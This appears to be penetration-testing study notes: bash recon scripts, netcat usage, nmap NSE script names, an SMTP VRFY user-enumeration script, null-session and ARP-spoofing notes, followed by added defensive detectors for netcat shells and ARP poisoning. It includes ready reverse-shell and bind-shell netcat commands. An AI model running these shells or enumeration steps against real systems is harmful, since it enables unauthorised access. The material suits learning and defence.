BASH (save as .sh and chmod 755):
*****************************************************************
(the original scripts used "#!/bin/bash/" with a trailing slash, which stops them running; the shebang is corrected below)

text manipulation-
#!/bin/bash
# take the host part of every href in icq.html, keep the icq.com ones, dedupe
grep "href=" icq.html | cut -d"/" -f3 | grep icq.com | sort -u

find IPs-
#!/bin/bash
# resolve every name in icqservers.txt (one per line) and print only the address
for name in $(cat icqservers.txt); do
  host $name | grep "has address" | cut -d" " -f4
done

ping IPs-
#!/bin/bash
for ip in $(seq 200 250); do
  ping -c1 192.168.1.$ip | grep "bytes from"
done

DNS Forward-
#!/bin/bash
# the loop header was lost in the original; names.txt (one label per line) is an assumed input file
for name in $(cat names.txt); do
  host $name.checkpoint.com | grep "has address"
done

DNS Reverse-
#!/bin/bash
for ip in $(seq 64 79); do
  host 204.236.255.$ip | grep "domain name pointer"
done

Zone XFR-
#!/bin/bash
echo "[*] Please enter a domain name:"
read domain
# ask each NS record for a full zone listing (the original had "host -l domain", missing the $)
for fqdn in $(host -t ns $domain | cut -d" " -f4); do
  host -l $domain $fqdn | grep "has address"
done

SNMP Bruteforce (for use with onesixtyone)- (script to glean a local address list for 161)
#!/bin/bash
for ip in $(seq 1 254); do
  echo ip.usally.local.$ip
done > log.txt

***************************************************************

BindShell: nc -lvp 4444 listens on port 4444; adding -e cmd.exe (or -e /bin/bash) hands that program the connection, aka binding cmd or bash to nc.
i.e: nc -lvp 4444 -e cmd.exe

ReverseShell: nc -v x.x.x.x 4444 connects to IP x.x.x.x on port 4444; with -e cmd.exe or -e /bin/bash the shell is forwarded to that IP on port 4444.
i.e: nc -v x.x.x.x 4444 -e /bin/bash

Banner Grab: nc -v www.x.com 80, then type HEAD / HTTP/1.0 followed by an empty line,
or: echo -ne 'HEAD / HTTP/1.0\r\n\r\n' | nc -vv www.x.com 80

netcat portscan: nc -z -nvv -w 1 x.x.x.x <port or port range>

netcat options:
-p port      local port number
-l           listen mode, for inbound connects
-e prog      program to exec after connect
-o file      hex dump of traffic
-g gateway   source-routing hop point[s], up to 8
-G num       source-routing pointer: 4, 8, 12, ...
-h           this cruft
-i secs      delay interval for lines sent, ports scanned
-n           numeric-only IP addresses, no DNS
-r           randomize local and remote ports
-s addr      local source address
-t           answer TELNET negotiation
-u           UDP mode
-v           verbose [use twice to be more verbose]
-w secs      timeout for connects and final net reads
-z           zero-I/O mode [used for scanning]

NSE: nmap --script X.nse
/usr/share/nmap/scripts/asn-query.nse
/usr/local/share/nmap/scripts/auth-owners.nse
/usr/local/share/nmap/scripts/auth-spoof.nse
/usr/local/share/nmap/scripts/banner.nse
/usr/local/share/nmap/scripts/smb-brute.nse
/usr/local/share/nmap/scripts/smb-check-vulns.nse
/usr/local/share/nmap/scripts/smb-enum-domains.nse
/usr/local/share/nmap/scripts/smb-enum-groups.nse
/usr/local/share/nmap/scripts/smb-enum-processes.nse
/usr/local/share/nmap/scripts/smb-enum-sessions.nse
/usr/local/share/nmap/scripts/smb-enum-shares.nse
/usr/local/share/nmap/scripts/smb-enum-users.nse
/usr/local/share/nmap/scripts/smb-os-discovery.nse
/usr/local/share/nmap/scripts/smb-psexec.nse
/usr/local/share/nmap/scripts/smb-security-mode.nse
/usr/local/share/nmap/scripts/smb-server-stats.nse
/usr/local/share/nmap/scripts/smb-system-info.nse
/usr/local/share/nmap/scripts/smbv2-enabled.nse
/usr/local/share/nmap/scripts/smtp-commands.nse
/usr/local/share/nmap/scripts/smtp-open-relay.nse
/usr/local/share/nmap/scripts/smtp-strangeport.nse
/usr/local/share/nmap/scripts/sniffer-detect.nse
/usr/local/share/nmap/scripts/snmp-brute.nse
/usr/local/share/nmap/scripts/snmp-sysdescr.nse
/usr/local/share/nmap/scripts/socks-open-proxy.nse
/usr/local/share/nmap/scripts/sql-injection.nse
/usr/local/share/nmap/scripts/ssh-hostkey.nse
/usr/local/share/nmap/scripts/sshv1.nse
/usr/local/share/nmap/scripts/ssl-cert.nse
/usr/local/share/nmap/scripts/sslv2.nse
/usr/local/share/nmap/scripts/telnet-brute.nse
/usr/local/share/nmap/scripts/upnp-info.nse
/usr/local/share/nmap/scripts/whois.nse
/usr/local/share/nmap/scripts/x11-access.nse

Python:

SMTP USER CHECK-
#!/usr/bin/env python3
import socket
import sys

# usage: vrfy.py <user> <host> [port]
# the original hard-coded the target in s.connect(('',)) and the host/port were
# lost in the copy, so they are taken from the command line here (port defaults to 25)
if len(sys.argv) < 3:
    print("usage: vrfy.py <user> <host> [port]")
    sys.exit(0)
user, host = sys.argv[1], sys.argv[2]
port = int(sys.argv[3]) if len(sys.argv) > 3 else 25

# create socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to server
s.connect((host, port))
# receive & print banner
banner = s.recv(1024)
print(banner.decode(errors="replace").strip())
# send VRFY request & print the reply
s.send(('VRFY ' + user + '\r\n').encode())
result = s.recv(1024)
print(result.decode(errors="replace").strip())
# close socket
s.close()

Null Session Attacks:
rpcclient -U "" x.x.x.x
then at the rpcclient prompt: help, srvinfo, enumdomusers, enumdomgroups, getdompwinfo (the original had "getdomwinfo", which is not a command)

ARPSpoof Notes:
ipv6 doesn't use ARP, so it is not susceptible to ARP poisoning/spoofing.
ARP spoofing is a local attack by default. There are ways to circumvent this, but they are not covered here.
You will want the following information:
Gateway : ipv4:MAC
Attacker: ipv4:MAC
Victim  : ipv4:MAC
You will need the following *NIX command and BASH script (file2cable):
*(1) ip forward: echo 1 > /proc/sys/net/ipv4/ip_forward
*(2) the file2cable bash script: save the script as .sh, chmod 755, execute as ./
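Looking at the bind/reverse shell notes above from the host-monitoring side: the following is an added example, not part of the original post, that walks a process listing and flags netcat processes that have a program attached with -e/-c (or ncat's --exec), telling a listening bind shell apart from an outbound reverse shell and leaving plain scans and banner grabs alone. The ps lines are constructed (documentation-range addresses), and classify_nc, scan_ps and SAMPLE_PS are names chosen here.

```python
#!/usr/bin/env python3
"""Flag netcat processes that attach a shell to the connection.

Added example for the bind/reverse shell notes; not part of the original post.
Input is constructed `ps -eo pid,user,args` output.
"""
import shlex

NC_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}


def classify_nc(argv):
    """Return 'bind', 'reverse' or None for one netcat argv list.

    'bind'    = listening (-l / --listen) with -e/-c/--exec, i.e. a bind shell
    'reverse' = connecting out with -e/-c/--exec, i.e. a reverse shell
    None      = not netcat, or netcat without a program attached (scan, banner grab)
    """
    if not argv or argv[0].rsplit("/", 1)[-1] not in NC_NAMES:
        return None
    program = None
    listening = False
    i = 1
    while i < len(argv):
        a = argv[i]
        if a in ("-e", "-c", "--exec", "--sh-exec") and i + 1 < len(argv):
            program = argv[i + 1]
            i += 2
            continue
        if a.startswith(("--exec=", "--sh-exec=")):
            program = a.split("=", 1)[1]
        elif a == "--listen":
            listening = True
        elif a.startswith("-") and not a.startswith("--") and "l" in a[1:]:
            listening = True  # short-option cluster such as -lvp carries the listen flag
        i += 1
    if program is None:
        return None
    return "bind" if listening else "reverse"


def scan_ps(lines):
    """Parse 'PID USER COMMAND' lines; return (pid, user, kind, command) for hits."""
    hits = []
    for line in lines:
        parts = line.split(None, 2)
        if len(parts) < 3 or not parts[0].isdigit():
            continue  # header line or malformed row
        pid, user, command = parts
        try:
            argv = shlex.split(command)
        except ValueError:
            argv = command.split()
        kind = classify_nc(argv)
        if kind:
            hits.append((int(pid), user, kind, command))
    return hits


# Constructed sample listing (documentation-range addresses, not captured data).
SAMPLE_PS = """\
  PID USER     COMMAND
  412 root     /usr/sbin/sshd -D
 1337 www-data nc -lvp 4444 -e /bin/bash
 2048 alice    nc -v 203.0.113.5 4444 -e /bin/bash
 3101 bob      nc -z -nvv -w 1 203.0.113.7 80
 4400 svc      ncat --listen 9001 --exec /bin/sh
""".splitlines()

if __name__ == "__main__":
    for pid, user, kind, command in scan_ps(SAMPLE_PS):
        print(f"[{kind:7}] pid={pid} user={user} cmd={command}")
```

Feed it real output with ps -eo pid,user,args and it flags only the two shells and the ncat listener; the -z scan on pid 3101 is reported as nothing because no program is attached. Renamed binaries and other tools that offer the same thing are outside what this check sees, so it belongs alongside network-side monitoring rather than in place of it.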
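For the ARPSpoof notes above, here is the detection side as an added example; it is not the post's file2cable script. It reads ARP replies in the format tcpdump -n arp prints and raises an alert when an IP is answered for by a MAC other than the one first seen for it, and when the MAC answering for the gateway also answers for some other host (the Gateway/Attacker/Victim triple from the notes, seen from the wire). The sample lines are constructed, detect_arp_spoof and parse_replies are names chosen here, and the gateway address 192.168.1.1 is an assumption.

```python
#!/usr/bin/env python3
"""Spot ARP cache poisoning from a stream of ARP replies.

Added example for the ARP spoofing notes; it is not the post's file2cable
script. Sample lines are constructed in the format `tcpdump -n arp` prints.
"""
import re
from collections import defaultdict

ARP_REPLY = re.compile(r"Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-fA-F:]{17})")


def parse_replies(lines):
    """Yield (sender_ip, sender_mac) from tcpdump-style ARP reply lines."""
    for line in lines:
        m = ARP_REPLY.search(line)
        if m:
            yield m.group(1), m.group(2).lower()


def detect_arp_spoof(replies, gateway_ip):
    """Return alert strings for two poisoning signals:
    1. an IP answered for by a MAC different from the one first seen for it
    2. the gateway IP answered for by a MAC that also claims another IP
    """
    first_mac = {}                 # ip -> MAC first seen for it
    seen_macs = defaultdict(set)   # ip -> all MACs seen for it
    ips_by_mac = defaultdict(set)  # mac -> all IPs it has claimed
    alerts = []
    gateway_alerted = set()        # MACs already reported for signal 2
    for ip, mac in replies:
        first_mac.setdefault(ip, mac)
        if mac not in seen_macs[ip]:
            seen_macs[ip].add(mac)
            if mac != first_mac[ip]:
                alerts.append(f"{ip} changed from {first_mac[ip]} to {mac}")
        ips_by_mac[mac].add(ip)
        if ip == gateway_ip and mac not in gateway_alerted:
            others = sorted(ips_by_mac[mac] - {gateway_ip})
            if others:
                gateway_alerted.add(mac)
                alerts.append(f"gateway {gateway_ip} claimed by {mac}, "
                              f"which also claims {', '.join(others)}")
    return alerts


# Constructed sample: gateway 192.168.1.1 and host .50 are genuine at first, then
# de:ad:be:ef:00:66 (the address owned by .66) starts answering for both of them.
SAMPLE_LINES = [
    "12:00:00.000001 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:01, length 28",
    "12:00:00.000002 ARP, Reply 192.168.1.50 is-at 00:11:22:33:44:50, length 28",
    "12:00:00.000003 ARP, Reply 192.168.1.66 is-at de:ad:be:ef:00:66, length 28",
    "12:00:00.000004 ARP, Request who-has 192.168.1.50 tell 192.168.1.66, length 28",
    "12:00:01.000005 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:66, length 28",
    "12:00:01.000006 ARP, Reply 192.168.1.50 is-at de:ad:be:ef:00:66, length 28",
]

if __name__ == "__main__":
    for alert in detect_arp_spoof(parse_replies(SAMPLE_LINES), "192.168.1.1"):
        print("ALERT:", alert)
```

The first-seen MAC is trusted as the baseline, so the script is only as good as the moment it started; on a real segment seed first_mac from a known-good table (the ipv4:MAC pairs the notes say to collect) instead of from traffic. A legitimate gateway failover or NIC replacement also trips signal 1, which is why the gateway-plus-another-host signal is kept separate.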